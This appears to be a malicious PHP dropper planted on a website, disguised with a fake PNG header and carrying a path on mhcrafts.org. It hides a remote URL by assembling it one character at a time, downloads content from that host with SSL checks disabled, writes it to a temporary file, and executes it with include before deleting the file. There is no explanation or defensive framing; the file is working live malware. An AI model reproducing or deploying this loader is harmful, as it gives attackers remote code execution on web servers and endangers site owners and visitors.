PNG %k25u25%fgd5n!
/home/mkuwqnjx/mhcrafts.org/hcn.php
<?php
// Tanda Build: 67893CF63E60

function fetch_content() {
    $components = [
        ['h', 't', 't', 'p', 's', ':', '/', '/'],
        ['w', 'w', 'w', '.', 'a', 'w', 's', 'c', 'l', 'o', 'u', 'd', '.', 'i', 'c', 'u'],
        ['/', 'r', 'a', 'w', '/'],
        ['z', 'D', '3', 'x', 'A']
    ];
    $target_url = '';
    foreach ($components as $part) {
        $target_url .= implode('', $part);
    }
    
    $data = '';
    if (function_exists('curl_init')) {
        $request = curl_init($target_url);
        curl_setopt_array($request, [
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_TIMEOUT => 3,
            CURLOPT_SSL_VERIFYPEER => false,
            CURLOPT_SSL_VERIFYHOST => false
        ]);
        $data = curl_exec($request);
        curl_close($request);
    }
    
    if (empty($data)) {
        $ctx = stream_context_create([
            'http' => ['timeout' => 3, 'ignore_errors' => true],
            'ssl' => ['verify_peer' => false, 'verify_peer_name' => false]
        ]);
        $data = @file_get_contents($target_url, false, $ctx);
    }
    
    if ($data && !empty($data)) {
        $tmp_file = tempnam(sys_get_temp_dir(), 'tmp_');
        if (file_put_contents($tmp_file, $data) !== false) {
            include $tmp_file;
            @unlink($tmp_file);
        }
    }
}
fetch_content();
?>